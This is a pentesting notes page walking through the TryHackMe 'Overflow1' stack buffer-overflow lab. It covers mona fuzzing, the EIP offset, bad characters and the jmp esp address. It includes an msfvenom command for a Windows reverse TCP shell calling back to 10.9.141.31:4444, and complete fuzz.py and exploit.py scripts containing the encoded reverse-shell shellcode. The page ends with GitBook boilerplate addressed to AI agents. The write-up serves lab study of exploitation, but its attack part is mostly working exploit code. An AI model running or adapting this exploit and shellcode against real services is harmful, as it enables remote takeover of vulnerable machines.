> For the complete documentation index, see [llms.txt](https://infintesky.gitbook.io/pentesting/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://infintesky.gitbook.io/pentesting/buffer-overflow/tryhackme-practice/overflow1.md). # Overflow1 ### 1. Fuzz application to find number of bytes needed to crash the application ![](/files/1bQGtTaP0lpQi6vzqooa) Bytes needed to crash application: 2000 ### 2. Set mona configuration `!mona config -set workingfolder c:\mona\%p` ![](/files/340JvRfyB8Bh7nRD8niL) ### 3. Find `EIP` offset We first generate a cyclic pattern of a length 2000 bytes longer than the string that crashed the server `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000` ![](/files/eSnUoFPAQVSbFRU1gvnJ) Let's add this to the payload component of our `exploit.py`. Next, let's run exploit.py. ![](/files/lNzEeLTYXv6gLiAXyc7t) Next, let's use the following command to find what is inside EIP. `!mona findmsp -distance 2000` ![](/files/XCZKz16AMHJvX6NYMpRv) Notice that the highlighted line says that the EIP offset is at 1978. Let's change the EIP offset in `exploit.py` to 1978 and set our payload to "BBBB". If our EIP offset is correct, when the program crashes, EIP will contain "BBBB" which is 42424242. ![](/files/lC5ZO7p6dvLEbmJQPscf) True enough, EIP contains 42424242. EIP offset: 1978 ### 4. Find bad characters Let's generate a byte array in mona: `!mona bytearray -b "\x00"` We then add the output into our payload in exploit.py and run it. Then we run `!mona compare -f C:\mona\oscp\bytearray.bin -a `. Notice the mona indicates that `\x07`, `\x08`, `\x2e`, `\x2f`, `\xa0` and `\xa1` are bad characters. My guess is that the bad characters are `\x00\x07\x2e\xa0`. The reason is usually the first bad character would corrupt the memory leaving the following character to be detected as a bad character by mona. ![](/files/SsgN6MWJYY8a4L6PSy21) Let's test this out and remove `\x00\x07\x2e\xa0` from our payload. ![](/files/qYXvgAKorEaq9ttvpnYJ) Hence, our bad characters are "`\x00\x07\x2e\xa0`" ### 5. Find `jmp esp` instruction sets without any bad characters `!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"` ![](/files/LcnyPI8IjT1V3FjG7OjX) We can use the first one. `Jmp esp` instruction address: `0x625011af` So let's set the return address in our payload to "`\xaf\x11\x50\x62`" ### 6. Generate shellcode `msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c` ![](/files/hHw0KUDvB0xP1AohOKKO) Let's copy this into our payload component. ### 7. Set `nop` sled in padding Let's set the nop sled in padding and run exploit.py. ![](/files/95KBX4wDeGd1buO23yV1) ### Final Payload {% tabs %} {% tab title="fuzz.py" %} ```python import socket, time, sys ip = "10.10.5.24" port = 1337 timeout = 5 prefix = "OVERFLOW1 " string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1) ``` {% endtab %} {% tab title="exploit.py" %} ```python import socket ip = "10.10.5.24" port = 1337 prefix = "OVERFLOW1 " ## optional eip_offset = 1978 overflow = "A" * eip_offset retn = "\xaf\x11\x50\x62" ## If retn address == 0x625011af. Set retn address in script == \xaf\x11\x50\x62 padding = "\x90" * 24 ## For nop sled payload= ("\xdb\xd5\xd9\x74\x24\xf4\xbd\x0c\x1e\x6e\x67\x5a\x29\xc9\xb1" "\x52\x31\x6a\x17\x03\x6a\x17\x83\xce\x1a\x8c\x92\x32\xca\xd2" "\x5d\xca\x0b\xb3\xd4\x2f\x3a\xf3\x83\x24\x6d\xc3\xc0\x68\x82" "\xa8\x85\x98\x11\xdc\x01\xaf\x92\x6b\x74\x9e\x23\xc7\x44\x81" "\xa7\x1a\x99\x61\x99\xd4\xec\x60\xde\x09\x1c\x30\xb7\x46\xb3" "\xa4\xbc\x13\x08\x4f\x8e\xb2\x08\xac\x47\xb4\x39\x63\xd3\xef" "\x99\x82\x30\x84\x93\x9c\x55\xa1\x6a\x17\xad\x5d\x6d\xf1\xff" "\x9e\xc2\x3c\x30\x6d\x1a\x79\xf7\x8e\x69\x73\x0b\x32\x6a\x40" "\x71\xe8\xff\x52\xd1\x7b\xa7\xbe\xe3\xa8\x3e\x35\xef\x05\x34" "\x11\xec\x98\x99\x2a\x08\x10\x1c\xfc\x98\x62\x3b\xd8\xc1\x31" "\x22\x79\xac\x94\x5b\x99\x0f\x48\xfe\xd2\xa2\x9d\x73\xb9\xaa" "\x52\xbe\x41\x2b\xfd\xc9\x32\x19\xa2\x61\xdc\x11\x2b\xac\x1b" "\x55\x06\x08\xb3\xa8\xa9\x69\x9a\x6e\xfd\x39\xb4\x47\x7e\xd2" "\x44\x67\xab\x75\x14\xc7\x04\x36\xc4\xa7\xf4\xde\x0e\x28\x2a" "\xfe\x31\xe2\x43\x95\xc8\x65\x66\x63\x5f\x6a\x1e\x71\x5f\x84" "\x82\xfc\xb9\xcc\x2a\xa9\x12\x79\xd2\xf0\xe8\x18\x1b\x2f\x95" "\x1b\x97\xdc\x6a\xd5\x50\xa8\x78\x82\x90\xe7\x22\x05\xae\xdd" "\x4a\xc9\x3d\xba\x8a\x84\x5d\x15\xdd\xc1\x90\x6c\x8b\xff\x8b" "\xc6\xa9\xfd\x4a\x20\x69\xda\xae\xaf\x70\xaf\x8b\x8b\x62\x69" "\x13\x90\xd6\x25\x42\x4e\x80\x83\x3c\x20\x7a\x5a\x92\xea\xea" "\x1b\xd8\x2c\x6c\x24\x35\xdb\x90\x95\xe0\x9a\xaf\x1a\x65\x2b" "\xc8\x46\x15\xd4\x03\xc3\x35\x37\x81\x3e\xde\xee\x40\x83\x83" "\x10\xbf\xc0\xbd\x92\x35\xb9\x39\x8a\x3c\xbc\x06\x0c\xad\xcc" "\x17\xf9\xd1\x63\x17\x28") ## Shellcode frm msfvenom postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") ``` {% endtab %} {% endtabs %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infintesky.gitbook.io/pentesting/buffer-overflow/tryhackme-practice/overflow1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.